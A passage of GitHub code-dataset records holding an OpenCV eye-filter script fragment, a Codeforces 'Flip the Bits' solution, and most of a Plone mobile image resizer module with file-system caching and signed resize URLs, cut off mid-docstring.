left_e_top_left[0]: left_e_top_left[0] + left_eye_width]\n r_eye_area = frame[right_e_top_left[1]: right_e_top_left[1] + right_eye_height,\n right_e_top_left[0]: right_e_top_left[0] + right_eye_width]\n cv2.imshow(\"l_eye_mask\", l_eye_mask)\n l_eye_area_no_eye = cv2.bitwise_and(l_eye_area, l_eye_area, mask = l_eye_mask)\n l_eye_no_back = cv2.bitwise_and(l_eye, l_eye, mask=l_eye_mask_inv)\n\n r_eye_area_no_eye = cv2.bitwise_and(r_eye_area, r_eye_area, mask=r_eye_mask)\n r_eye_no_back = cv2.bitwise_and(r_eye, r_eye, mask=r_eye_mask_inv)\n\n cv2.imshow(\"l_Eye no eye\", l_eye_area_no_eye)\n final_l_eye = cv2.add(l_eye_no_back, l_eye_area_no_eye)\n final_r_eye = cv2.add(r_eye_no_back, r_eye_area_no_eye)\n cv2.imshow(\"Left eye area\", l_eye_area)\n\n frame[left_e_top_left[1]: left_e_top_left[1] + left_eye_height,\n left_e_top_left[0]: left_e_top_left[0] + left_eye_width] = final_l_eye\n frame[right_e_top_left[1]: right_e_top_left[1] + right_eye_height,\n right_e_top_left[0]: right_e_top_left[0] + right_eye_width] = final_r_eye\n cv2.imshow(\"Left eye image\", l_eye)\n cv2.imshow(\"Final left eye\", final_l_eye)\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1)\n if key == 27:\n break","repo_name":"abrahamdaf/semana_tec_filtro","sub_path":"Eye_filter/Crying_eyes.py","file_name":"Crying_eyes.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} 
+{"seq_id":"27382853424","text":"# Author Name: Ajay Meena\n# Codeforce : https://codeforces.com/profile/majay1638\nimport sys\nimport math\nimport bisect\nimport heapq\nfrom bisect import bisect_right\nfrom sys import stdin, stdout\n\n# -------------- INPUT FUNCTIONS ------------------\n\n\ndef get_ints_in_variables(): return map(\n int, sys.stdin.readline().strip().split())\n\n\ndef get_int(): return int(sys.stdin.readline())\n\n\ndef get_ints_in_list(): return list(\n map(int, sys.stdin.readline().strip().split()))\ndef get_list_of_list(n): return [list(\n map(int, sys.stdin.readline().strip().split())) for _ in range(n)]\n\n\ndef get_string(): return sys.stdin.readline().strip()\n\n# -------------- SOLUTION FUNCTION ------------------\n\n\ndef Solution(a, b, n):\n # Write Your Code Here\n onesCount = 0\n zeroCount = 0\n for c in a:\n if c == \"1\":\n onesCount += 1\n else:\n zeroCount += 1\n\n if a == b:\n print(\"YES\")\n else:\n flag = True\n changed = False\n for i in range(n-1, -1, -1):\n if ((a[i] != b[i] and not changed) or (a[i] == b[i] and changed)):\n if(zeroCount == onesCount):\n changed = not changed\n else:\n flag = False\n break\n if a[i] == \"1\":\n onesCount -= 1\n else:\n zeroCount -= 1\n if flag:\n print(\"YES\")\n else:\n print(\"NO\")\n\n\ndef main():\n # Take input Here and Call solution function\n for _ in range(get_int()):\n n = get_int()\n a = get_string()\n b = get_string()\n Solution(a, b, n)\n\n\n# calling main Function\nif __name__ == '__main__':\n main()\n","repo_name":"hacetheworld/competitive-programming-practices","sub_path":"contests/codeforce/div2/712/B_Flip_the_Bits.py","file_name":"B_Flip_the_Bits.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"11154174885","text":"\"\"\"\n\n Caching mobile image resizer.\n\n Resizes both Zope internal and arbitrary URL image resources.\n\n\"\"\"\n\n\n__license__ = \"GPL 2\"\n__copyright__ = \"2010 mFabrik Research Oy\"\n__author__ = \"Mikko Ohtamaa \"\n__docformat__ = \"epytext\"\n\nimport os\nimport md5\nimport urllib\nimport logging\nimport shutil\nfrom cStringIO import StringIO\n\nfrom AccessControl import Unauthorized\nfrom Acquisition import aq_base, aq_inner\nimport zope.interface\n\nfrom zope.interface import implements\nfrom zope.component import getMultiAdapter, getUtility, queryUtility\nfrom zope.app.container.interfaces import INameChooser\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom Products.Five.browser import BrowserView\nfrom Products.statusmessages.interfaces import IStatusMessage\nfrom Products.CMFPlone.browser import ploneview\nfrom Products.CMFCore.utils import getToolByName\nfrom zope.app.component.hooks import getSite\nfrom plone.app.redirector.storage import RedirectionStorage\n\nfrom mobile.sniffer.utilities import get_user_agent, get_user_agent_hash\n\nfrom mobile.htmlprocessing.transformers.imageresizer import ImageResizer\n\nfrom gomobile.mobile.interfaces import IMobileImageProcessor, IUserAgentSniffer\nfrom gomobile.mobile.interfaces import IMobileRequestDiscriminator, MobileRequestType\nfrom gomobile.imageinfo.interfaces import IImageInfoUtility\nfrom gomobile.mobile.utilities import getMobileProperties\n\n# Do not exceed these resize dimensions\nsafe_width = 1000\nsafe_height = 1000\n\nlogger = logging.getLogger(\"Resizer\")\n\n# Debug variable for unit tests\ncache_hits = 0\n\nDEFAULT_CACHE_PATH=\"/tmp/gomobile_image_cache\"\n\nVIEW_NAME = 
\"@@mobile_image_processor\"\n\nclass FSCache(object):\n \"\"\" Simple balanced folder based file system cache for images.\n\n Use cron job + timestamps to invalidate the cache.\n\n Each file path and name is hex digest of MD5 calculated from the cache key.\n Files are created in folder structure nested two levels to avoid too many files per one folder::\n\n DEFAULT_CACHE_PATH/00/00/000012341234\n DEFAULT_CACHE_PATH/00/10/001012341234\n DEFAULT_CACHE_PATH/10/00/100012341234\n DEFAULT_CACHE_PATH/10/10/101012341234\n\n \"\"\"\n def __init__(self, root_path):\n self.root_path = root_path\n\n def makePathKey(self, ob):\n \"\"\"\n Calculate hex digest.\n \"\"\"\n ikey = str(ob)\n return md5.new(ikey).hexdigest()\n\n def get(self, key, default=None):\n \"\"\" Get the cached file and update its timestamp.\n\n @return: Path to cached file or None if not cached\n \"\"\"\n\n global cache_hits\n\n logger.debug(\"Checking resizer image cache for \" + key)\n\n work_dir, path = self.getOrCreatePath(key)\n if not os.path.exists(path):\n return default\n else:\n\n # http://stackoverflow.com/questions/1158076/implement-touch-using-python\n # We set both access time and modified time, as the file may be\n # on relatime file system\n os.utime(path, None)\n cache_hits += 1\n return path\n\n def getOrCreatePath(self, key):\n \"\"\"\n @return: tuple (work dir path, final file path)\n \"\"\"\n path1 = key[0:2]\n path2 = key[2:4]\n\n # TODO: Do this only once and get rid of this\n #fspermissions.ensure_writable_folder(storage_folder)\n #fspermissions.ensure_writable_folder(os.path.join(storage_folder, path1))\n #fspermissions.ensure_writable_folder(os.path.join(storage_folder, path1, path2))\n path = os.path.join(self.root_path, path1, path2)\n\n if not os.path.exists(path):\n os.makedirs(path, 0x1FF)\n\n full_path = os.path.join(path, key)\n\n return path, full_path\n\n def makeTempFile(self, work_path):\n \"\"\"\n \"\"\"\n return os.path.join(work_path, os.tmpnam())\n\n\n def closeTempFile(self, temp, full):\n \"\"\" Perform final cache set as atomic FS operation.\n \"\"\"\n logger.debug(\"Created image cache file:\" + full)\n #os.rename(temp, full)\n # Fix for freebsd http://code.google.com/p/plonegomobile/issues/detail?id=9\n shutil.move(temp, full)\n\n def set(self, key, value):\n \"\"\"\n \"\"\"\n work_path, file_path = self.getOrCreatePath(key)\n\n # Create a cached copy\n temp = self.makeTempFile(work_path)\n file = open(temp, \"wb\")\n file.write(value)\n file.close()\n\n self.closeTempFile(temp, file_path)\n\n def invalidate(self):\n \"\"\" Nuke all files from the cache.\n\n One should do something smarter here.\n \"\"\"\n if os.path.exists(self.root_path):\n shutil.rmtree(self.root_path)\n\nclass HTMLMutator(ImageResizer):\n \"\"\"\n Rewrite in HTML content code.\n\n Use mobile.htmlprocessing package and provide Plone specific callbacks.\n \"\"\"\n\n def __init__(self, baseURL, trusted, rewriteCallback):\n ImageResizer.__init__(self, baseURL, trusted)\n self.rewriteCallback = rewriteCallback\n\n def rewrite(self, url):\n return self.rewriteCallback(url)\n\nclass MobileImageProcessor(object):\n\n zope.interface.implements(IMobileImageProcessor)\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n\n def init(self):\n self.site = getSite()\n self.cache = FSCache(self.getCachePath())\n\n def getSecret(self):\n \"\"\" Avoid properties look up using cached value.\n\n @return: Unguessable string, unique to a site\n \"\"\"\n _secret = 
self.site.portal_properties.mobile_properties.image_resizer_secret\n return _secret\n\n\n def calculateSignature(self, **kwargs):\n \"\"\" Calculate protected MD5 for resizing parameters, so that input is protected against DoS attacks \"\"\"\n\n logger.debug(\"Calculating signature from params:\" + str(kwargs))\n\n # Sort parameters by key name, as MD5 function\n # is sensitive to the order of the parameters\n # and Python dict does not guarantee the order\n params = list(kwargs.items())\n\n def key_comparison(x, y):\n \"\"\"\n \"\"\"\n return cmp(x[0], y[0])\n\n params.sort(key_comparison)\n\n concat = \"\"\n for key, value in params:\n concat += key + \"=\" + str(value)\n concat += self.getSecret()\n return md5.new(concat).hexdigest()\n\n def isUserAgentSpecific(self, url, properties):\n \"\"\" Determine whether the result of resize may vary by user agent.\n\n If we need to vary by user agent, insert a string based\n on HTTP_USER_AGENT to the resizer GET query.\n \"\"\"\n return True\n\n def finalizeViewArguments(self, properties):\n \"\"\"\n Make sure that input parameters are URL compliant.\n \"\"\"\n for key, val in properties.items():\n properties[key] = str(val)\n\n # Make it so that no one else can guess working resizer URLs\n secret = self.calculateSignature(**properties)\n properties[\"secret\"] = secret\n return properties\n\n def removeScale(self, imagePath):\n \"\"\"\n Helper function to remove scale view name from the image path.\n\n @param imagePath: Site root relative path to the image as list.\n \"\"\"\n last = imagePath[-1]\n\n # Assume ATContentType image scales\n if last.startswith(\"image_\"):\n imagePath = imagePath[0:-1]\n\n return imagePath\n\n def mapURL(self, url):\n \"\"\" Make image URL relative to site root.\n\n If possible, make URI relative to site root\n so that we can safely pass it around from one page to another.\n\n If URL is absolute, don't touch it.\n\n @param url: Image URL or URI as a string\n \"\"\"\n\n rs = RedirectionStorage()\n if rs.has_path(url):\n url = rs.get(url)\n\n\n # Make sure we are traversing the context chain without view object messing up things\n context = self.context.aq_inner\n\n if url.startswith(\"http://\") or url.startswith(\"https://\"):\n # external URL\n url = url\n elif \"++resource\" in url:\n # Zope 3 resources are mapped to the site root\n url = url\n else:\n # Map the context path to the site root\n if url.startswith(\"/\"):\n # Pass URL to resizer view relocated to the site root\n\n url = url[1:]\n else:\n # The URL is relative to the context path\n # Map URL to be relative to the site root\n\n site = getSite()\n\n # check if the context is folderish so that we can\n # traverse from the parent if it's not\n folderish = getattr(aq_base(context), 'isPrincipiaFolderish',\n False)\n try:\n if folderish:\n imageObject = context.unrestrictedTraverse(url)\n else:\n imageObject = \\\n context.aq_parent.unrestrictedTraverse(url)\n except Unauthorized:\n # The parent folder might be private and the image\n # public, in which case we should be able to view\n # the image after all.\n parent_path = '/'.join(url.split('/')[:-1])\n image_path = url.split('/')[-1]\n parent = site.unrestrictedTraverse(parent_path)\n imageObject = parent.restrictedTraverse(image_path)\n\n if (\"FileResource\" in imageObject.__class__.__name__):\n # Five mangling compatible way to detect image urls pointing to the resource directory\n # ...but this should not happen if images are accessed using ++resource syntax\n return url\n elif hasattr(imageObject, 
\"getPhysicalPath\"):\n physicalPath = imageObject.getPhysicalPath() # This path is relative to Zope Application server root\n virtualPath = self.request.physicalPathToVirtualPath(physicalPath)\n\n # TODO: Assume Plone site is Zope app top level root object here\n\n # empty root node, site node\n assert len(physicalPath) > 2\n\n virtualPath = physicalPath[2:]\n\n virtualPath = self.removeScale(virtualPath)\n\n url = \"/\".join(virtualPath)\n else:\n raise RuntimeError(\"Unknown traversable image object:\" + str(imageObject))\n return url\n\n def getImageDownloadURL(self, url, properties={}):\n \"\"\"\n Return download URL for image which is put through image resizer.\n\n @param url: Source image URI, relative to context, or absolute URL\n\n @param properties: Extra options needed to be given to the resizer, e.g. padding, max width, etc.\n\n @return: String, URL where the resized image can be downloaded. This URL varies\n by the user agent.\n \"\"\"\n self.init()\n\n url = self.mapURL(url)\n\n # Prepare arguments for the image resizer view\n new_props = {\"conserve_aspect_ration\" : \"true\"}\n new_props.update(properties)\n new_props[\"url\"] = url\n\n if self.isUserAgentSpecific(url, new_props):\n # Check if the result may vary by user agent\n new_props[\"user_agent_md5\"] = get_user_agent_hash(self.request)\n\n new_props = self.finalizeViewArguments(new_props)\n\n return self.site.absolute_url() + \"/\" + VIEW_NAME + \"?\" + urllib.urlencode(new_props)\n\n\n def processHTML(self, data, trusted):\n \"\"\" Process all <img> tags in HTML code.\n\n Some error filtering is performed for incoming string data,\n as there are some common cases related to browser based WYSIWYG\n which will make shit hit the fan.\n\n @param base_url: Base URL of HTML document - for resolving relative img paths\n\n @return: Mutated HTML output as a string\n \"\"\"\n\n self.init()\n\n base = self.context.absolute_url()\n\n # create mobile.htmlprocessing helper\n mutator = HTMLMutator(base, trusted, self.getImageDownloadURL)\n\n if type(data) == str:\n data = unicode(data, \"utf-8\", errors=\"ignore\")\n\n # Need to fix Windows style new lines here or they will cause extra new lines in the output\n data = data.replace(u\"\\r\", u\"\")\n\n # Need to fix the Unicode non-breaking space or it will be escaped in the output and appear wrong\n # Use XML/XHTML entity &#160; to present this evil character\n data = data.replace(u\"\\xA0\", u\"&#160;\")\n\n processed = mutator.process(data)\n\n return processed\n\n def getCachePath(self):\n \"\"\"\n @return: FS path where cached resized scales are stored\n \"\"\"\n image_resize_cache_path = getattr(self.context.portal_properties.mobile_properties, \"image_resize_cache_path\", DEFAULT_CACHE_PATH)\n return image_resize_cache_path\n\n\n\nclass ResizeViewHelper(BrowserView):\n \"\"\"\n Base class from which you can derive your own image resizers, or call this as a helper from your own views.\n\n \"\"\"\n\n def init(self):\n\n self.resizer = getMultiAdapter((self.context, self.request), IMobileImageProcessor)\n self.resizer.init()\n\n sniffer = getMultiAdapter((self.context, self.request), IUserAgentSniffer)\n self.ua = sniffer.getUserAgentRecord()\n\n\n def buildCacheKey(self, width, height):\n \"\"\"\n Build cache key for result image data.\n\n This varies by width and height if we know them.\n If we don't know, then we use the user agent string itself as part of the key,\n so that different mobiles don't get the wrong image from the cache.\n \"\"\"\n\n # We know the user agent so we know the resulting 
width and height in this stage\n if self.ua:\n key = str(width) + \"-\" + str(height) + \"-\"\n else:\n key = get_user_agent_hash(self.request)\n\n def add_param(key, value):\n key += \"-\"\n key += str(value)\n return key\n\n key = add_param(key, self.cache_key)\n key = add_param(key, self.conserve_aspect_ration)\n key = add_param(key, self.padding_width)\n\n return key\n\n def parseParameters(self, parameters):\n \"\"\" Parse parameters needed for serving a resized image.\n \"\"\"\n self.width = parameters.get(\"width\", \"auto\")\n self.height = parameters.get(\"height\", \"auto\")\n self.padding_width = parameters.get(\"padding_width\", 0)\n self.conserve_aspect_ration = parameters.get(\"conserve_aspect_ration\", False)\n\n self.image = parameters.get(\"image\", None)\n self.url = parameters.get(\"url\", None)\n\n if not(self.image or self.url):\n raise RuntimeError(\"Needs either image or URL parameter\")\n\n self.cache_key = parameters.get(\"cache_key\", self.url)\n if not self.cache_key:\n raise RuntimeError(\"cache_key or URL parameter must be provided\")\n\n def resolveCacheFormat(self, data):\n \"\"\"\n Peek cached file first bytes to get the format.\n \"\"\"\n if data[1:4] == \"PNG\": # the PNG signature carries \"PNG\" at bytes 1-3\n return \"png\"\n elif data[0:3] == \"GIF\":\n return \"gif\"\n else:\n return \"jpeg\"\n\n\n def serve(self, width, height):\n \"\"\" Generate resized image or fetch one from cache.\n\n TODO: Clear up string / StringIO madness here in all those ifs\n \"\"\"\n key = self.buildCacheKey(width, height)\n path = self.resizer.cache.makePathKey(key)\n logger.debug(\"Performing mobile image resize cache look up \" + key + \" mapped to \" + path)\n\n file = self.resizer.cache.get(path)\n if file:\n f = open(file, \"rb\")\n data = f.read()\n f.close()\n format = self.resolveCacheFormat(data)\n value = data\n else:\n tool = getUtility(IImageInfoUtility)\n\n logger.debug(\"Resizing image to mobile dimensions %d %d\" % (width, height))\n\n if self.url:\n data, format = tool.getURLResizedImage(self.url, width, height, conserve_aspect_ration=self.conserve_aspect_ration)\n else:\n data, format = tool.resizeImage(self.image, width, height, conserve_aspect_ration=self.conserve_aspect_ration)\n\n # Mercifully cache broken images from remote HTTP downloads\n if data is None:\n value = \"\"\n else:\n value = data.getvalue()\n\n self.resizer.cache.set(path, value)\n\n if value == \"\":\n # We could not access the original image data\n self.request.response.setHeader(\"Content-type\", \"text/plain\")\n return \"Image resize error\"\n\n self.request.response.setHeader(\"Content-type\", \"image/\" + format)\n\n # TODO: Check whether we can stream response (no memory buffering)\n\n if hasattr(data, \"getvalue\"):\n # Looks like ZMedusa server cannot stream data to the client...\n # so we need to return it as memory buffered\n return data.getvalue()\n\n return data\n\n def resolveDimensions(self):\n \"\"\" Calculate final dimensions for the image.\n \"\"\"\n\n if self.ua:\n logger.debug(\"Using user agent:\" + str(self.ua.getMatchedUserAgent()))\n else:\n logger.debug(\"No user agent available for resolving the target image size\")\n\n if self.ua:\n canvas_width = self.ua.get(\"usableDisplayWidth\")\n canvas_height = self.ua.get(\"usableDisplayHeight\")\n else:\n canvas_width = None\n canvas_height = None\n\n # Fill in default info if user agent records are incomplete\n if not canvas_width:\n canvas_width = self.context.portal_properties.mobile_properties.default_canvas_width\n\n if not canvas_height:\n canvas_height = 
class ResizeView(ResizeViewHelper):
    """ Resizer view for arbitrary images looked up by URL or Zope path.

    An automatic width or height parameter can be used. In this case we
    check whether the mobile screen size has been sniffed from the user
    agent and, if so, use the mobile browser canvas dimensions.

    If width/height is automatic but no browser information is available,
    fall back to the default settings in mobile_properties.

    The HTTP GET query parameters are generated by MobileImageResizer.getImageDownloadURL().

    Special parameters:

    * override_secret: Set this query parameter to the site resizer secret
      code setting to override the DoS-preventing parameter signature check.
      Useful for debugging.

    The image results are cached on the file system. The cache path is configurable
    through the *image_resize_cache_path* mobile property and defaults to /tmp/gomobile_image_cache.
    The cache is never cleaned up, so you are responsible for setting up a scheduled
    task to remove old files.
    """


    def parseParameters(self):
        """ Parse the incoming HTTP GET parameters.
        """

        params = self.request.form

        padding_width = params.get("padding_width", "0")
        self.padding_width = int(padding_width)

        conserve_aspect_ration = params.get("conserve_aspect_ration", "false")
        self.conserve_aspect_ration = conserve_aspect_ration.lower() == "true"

        self.override_secret = params.get("override_secret", None)

        self.width = params.get("width", "auto")
        if self.width != "auto":
            self.width = int(self.width)

        self.height = params.get("height", "auto")
        if self.height != "auto":
            self.height = int(self.height)

        self.url = params.get("url", None)
        self.cache_key = self.url

    def checkSecret(self):
        """ Harden us against DoS attacks.

        All query parameters are signed; check that the caller knows the correct signature.
        """

        if self.override_secret:
            # Override the parameter signature check by directly providing
            # the shared secret as an HTTP query parameter, for testing
            if self.override_secret != self.resizer.getSecret():
                raise Unauthorized("Wrong override_secret: " + self.override_secret)
        else:

            # Verify that the secret signs all other parameters
            params = {}
            params.update(self.request.form)
            secret = params.get("secret", None)
            if secret:
                del params["secret"]

            calculated = self.resizer.calculateSignature(**params)

            if calculated != secret:
                raise Unauthorized("Bad image resizer secret: " + str(secret) + " calculated: " + str(calculated))



    def __call__(self):
        """ Serve the resized image for an HTTP GET request.
        """

        self.init()

        self.parseParameters()

        self.checkSecret()

        width, height = self.resolveDimensions()

        return self.serve(width, height)
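
# A request sketch (illustration only): how a signed resize URL is obtained
# and what checkSecret() above then verifies. The "secret" query parameter is
# assumed to be added by finalizeViewArguments() when getImageDownloadURL()
# builds the URL; the host and image path below are made up.
#
#   processor = getMultiAdapter((context, request), IMobileImageProcessor)
#   download_url = processor.getImageDownloadURL("images/logo.png",
#                                                {"padding_width": 10})
#   # -> http://site/<VIEW_NAME>?url=...&padding_width=10&secret=<signature>
#
# For manual testing, the signature check can be bypassed with the site-wide
# shared secret:
#
#   http://site/<VIEW_NAME>?url=images/logo.png&override_secret=<secret>
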
class ClearCacheView(BrowserView):
    """
    Expose clearing of the mobile image cache as a view.
    """

    def __call__(self):
        """
        TODO: Implement some smart timestamp checking here.
        """

        resizer = getMultiAdapter((self.context, self.request), IMobileImageProcessor)

        resizer.init()

        # Check that the caller knows the secret
        secret = self.request.form.get("secret", None)
        if secret != resizer.getSecret():
            raise Unauthorized("Wrong secret: " + str(secret))

        resizer.cache.invalidate()

        properties = getMobileProperties(self.context.aq_inner, self.request)
        cache_folder = properties.image_resize_cache_path

        return "Cache has been cleared: " + cache_folder

class IHTMLImageRewriter(zope.interface.Interface):
    """
    Declare RestrictedPython safe functions for the HTMLImageRewriter view.
    """

    def processHTML(html, trusted):
        pass

class HTMLImageRewriter(BrowserView):
    """
    Template helper view to rewrite HTML structure tags.

    For example, see document_view.pt in gomobiletheme.basic.

    Related tests are in gomobiletheme.basic.tests.
    """

    def processHTML(self, html, trusted=True, only_for_mobile=False):
        """ Rewrite HTML in a mobile compatible way.

        @param html: HTML code as a string

        @param trusted: If True do not clean up nasty tags like